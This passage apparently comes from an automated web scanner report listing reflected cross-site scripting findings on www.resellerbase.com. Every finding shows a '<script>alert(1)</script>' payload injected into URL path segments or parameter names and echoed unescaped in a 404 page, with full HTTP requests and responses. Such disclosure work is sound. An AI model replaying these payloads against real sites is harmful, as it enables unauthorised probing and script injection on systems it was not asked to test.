<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/20/themes/?3f82e<script>alert(1)</script>dd281557825=1 was not found on this server.</p>
...[SNIP]...

2.1674. http://www.resellerbase.com/detail/20/themes/kosmos/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/20/themes/kosmos/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 5ea5a<script>alert(1)</script>6634f508926 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail5ea5a<script>alert(1)</script>6634f508926/20/themes/kosmos/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:05:53 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail5ea5a<script>alert(1)</script>6634f508926/20/themes/kosmos/ was not found on this server.</p>
...[SNIP]...

2.1675. http://www.resellerbase.com/detail/20/themes/kosmos/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/20/themes/kosmos/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 63037<script>alert(1)</script>c9b55262a19 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/2063037<script>alert(1)</script>c9b55262a19/themes/kosmos/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:06:04 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/2063037<script>alert(1)</script>c9b55262a19/themes/kosmos/ was not found on this server.</p>
...[SNIP]...

2.1676. http://www.resellerbase.com/detail/20/themes/kosmos/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/20/themes/kosmos/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 2b087<script>alert(1)</script>86f1c9a04dd was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/20/themes2b087<script>alert(1)</script>86f1c9a04dd/kosmos/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:06:17 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/20/themes2b087<script>alert(1)</script>86f1c9a04dd/kosmos/ was not found on this server.</p>
...[SNIP]...

2.1677. http://www.resellerbase.com/detail/20/themes/kosmos/ [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/20/themes/kosmos/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 1e8f5<script>alert(1)</script>42ee98ece06 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/20/themes/kosmos1e8f5<script>alert(1)</script>42ee98ece06/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:06:28 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/20/themes/kosmos1e8f5<script>alert(1)</script>42ee98ece06/ was not found on this server.</p>
...[SNIP]...

2.1678. http://www.resellerbase.com/detail/20/themes/kosmos/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/20/themes/kosmos/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 27932<script>alert(1)</script>9e65be949c7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/20/themes/kosmos/?27932<script>alert(1)</script>9e65be949c7=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:05:33 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/20/themes/kosmos/?27932<script>alert(1)</script>9e65be949c7=1 was not found on this server.</p>
...[SNIP]...

2.1679. http://www.resellerbase.com/detail/20/themes/kosmos/images/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/20/themes/kosmos/images/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 8ec56<script>alert(1)</script>0f893cd557f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail8ec56<script>alert(1)</script>0f893cd557f/20/themes/kosmos/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:06:16 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail8ec56<script>alert(1)</script>0f893cd557f/20/themes/kosmos/images/ was not found on this server.</p>
...[SNIP]...

2.1680. http://www.resellerbase.com/detail/20/themes/kosmos/images/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/20/themes/kosmos/images/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 54097<script>alert(1)</script>e184974ad6a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/2054097<script>alert(1)</script>e184974ad6a/themes/kosmos/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:06:29 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/2054097<script>alert(1)</script>e184974ad6a/themes/kosmos/images/ was not found on this server.</p>
...[SNIP]...

2.1681. http://www.resellerbase.com/detail/20/themes/kosmos/images/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/20/themes/kosmos/images/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload a0531<script>alert(1)</script>16b8a41824b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/20/themesa0531<script>alert(1)</script>16b8a41824b/kosmos/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:06:44 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/20/themesa0531<script>alert(1)</script>16b8a41824b/kosmos/images/ was not found on this server.</p>
...[SNIP]...

2.1682. http://www.resellerbase.com/detail/20/themes/kosmos/images/ [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/20/themes/kosmos/images/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload f1328<script>alert(1)</script>d3464658724 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/20/themes/kosmosf1328<script>alert(1)</script>d3464658724/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:06:53 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/20/themes/kosmosf1328<script>alert(1)</script>d3464658724/images/ was not found on this server.</p>
...[SNIP]...

2.1683. http://www.resellerbase.com/detail/20/themes/kosmos/images/ [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/20/themes/kosmos/images/

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 337dd<script>alert(1)</script>6b16fd3eb3b was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/20/themes/kosmos/images337dd<script>alert(1)</script>6b16fd3eb3b/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:07:05 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/20/themes/kosmos/images337dd<script>alert(1)</script>6b16fd3eb3b/ was not found on this server.</p>
...[SNIP]...

2.1684. http://www.resellerbase.com/detail/20/themes/kosmos/images/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/20/themes/kosmos/images/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload df51a<script>alert(1)</script>66a0f4d074f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/20/themes/kosmos/images/?df51a<script>alert(1)</script>66a0f4d074f=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:05:56 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/20/themes/kosmos/images/?df51a<script>alert(1)</script>66a0f4d074f=1 was not found on this server.</p>
...[SNIP]...

2.1685. http://www.resellerbase.com/detail/20/themes/kosmos/images/rating/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/20/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 9cf91<script>alert(1)</script>6ecf6760bb7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail9cf91<script>alert(1)</script>6ecf6760bb7/20/themes/kosmos/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:06:29 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail9cf91<script>alert(1)</script>6ecf6760bb7/20/themes/kosmos/images/rating/ was not found on this server.</p>
...[SNIP]...

2.1686. http://www.resellerbase.com/detail/20/themes/kosmos/images/rating/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/20/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 27eda<script>alert(1)</script>a546fc18636 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/2027eda<script>alert(1)</script>a546fc18636/themes/kosmos/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:06:40 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/2027eda<script>alert(1)</script>a546fc18636/themes/kosmos/images/rating/ was not found on this server.</p>
...[SNIP]...

2.1687. http://www.resellerbase.com/detail/20/themes/kosmos/images/rating/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/20/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 40f39<script>alert(1)</script>859c4493e18 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/20/themes40f39<script>alert(1)</script>859c4493e18/kosmos/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:06:54 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/20/themes40f39<script>alert(1)</script>859c4493e18/kosmos/images/rating/ was not found on this server.</p>
...[SNIP]...

2.1688. http://www.resellerbase.com/detail/20/themes/kosmos/images/rating/ [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/20/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 515b0<script>alert(1)</script>d4071a41967 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/20/themes/kosmos515b0<script>alert(1)</script>d4071a41967/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:07:07 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/20/themes/kosmos515b0<script>alert(1)</script>d4071a41967/images/rating/ was not found on this server.</p>
...[SNIP]...

2.1689. http://www.resellerbase.com/detail/20/themes/kosmos/images/rating/ [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/20/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload abffa<script>alert(1)</script>82e9556817c was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/20/themes/kosmos/imagesabffa<script>alert(1)</script>82e9556817c/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:07:21 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/20/themes/kosmos/imagesabffa<script>alert(1)</script>82e9556817c/rating/ was not found on this server.</p>
...[SNIP]...

2.1690. http://www.resellerbase.com/detail/20/themes/kosmos/images/rating/ [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/20/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload f6bbd<script>alert(1)</script>eef24b82a02 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/20/themes/kosmos/images/ratingf6bbd<script>alert(1)</script>eef24b82a02/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:07:31 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/20/themes/kosmos/images/ratingf6bbd<script>alert(1)</script>eef24b82a02/ was not found on this server.</p>
...[SNIP]...

2.1691. http://www.resellerbase.com/detail/20/themes/kosmos/images/rating/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/20/themes/kosmos/images/rating/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload a6124<script>alert(1)</script>ab483c4937 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/20/themes/kosmos/images/rating/?a6124<script>alert(1)</script>ab483c4937=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:05:57 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/20/themes/kosmos/images/rating/?a6124<script>alert(1)</script>ab483c4937=1 was not found on this server.</p>
...[SNIP]...

2.1692. http://www.resellerbase.com/detail/20/themes/kosmos/images/rating/5.gif [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/20/themes/kosmos/images/rating/5.gif

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 51189<script>alert(1)</script>6076a6cdbd2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail51189<script>alert(1)</script>6076a6cdbd2/20/themes/kosmos/images/rating/5.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:28:20 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail51189<script>alert(1)</script>6076a6cdbd2/20/themes/kosmos/images/rating/5.gif was not found on this server.</p>
...[SNIP]...

2.1693. http://www.resellerbase.com/detail/20/themes/kosmos/images/rating/5.gif [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/20/themes/kosmos/images/rating/5.gif

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload e30db<script>alert(1)</script>fd0a187a4e1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/20e30db<script>alert(1)</script>fd0a187a4e1/themes/kosmos/images/rating/5.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:28:58 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

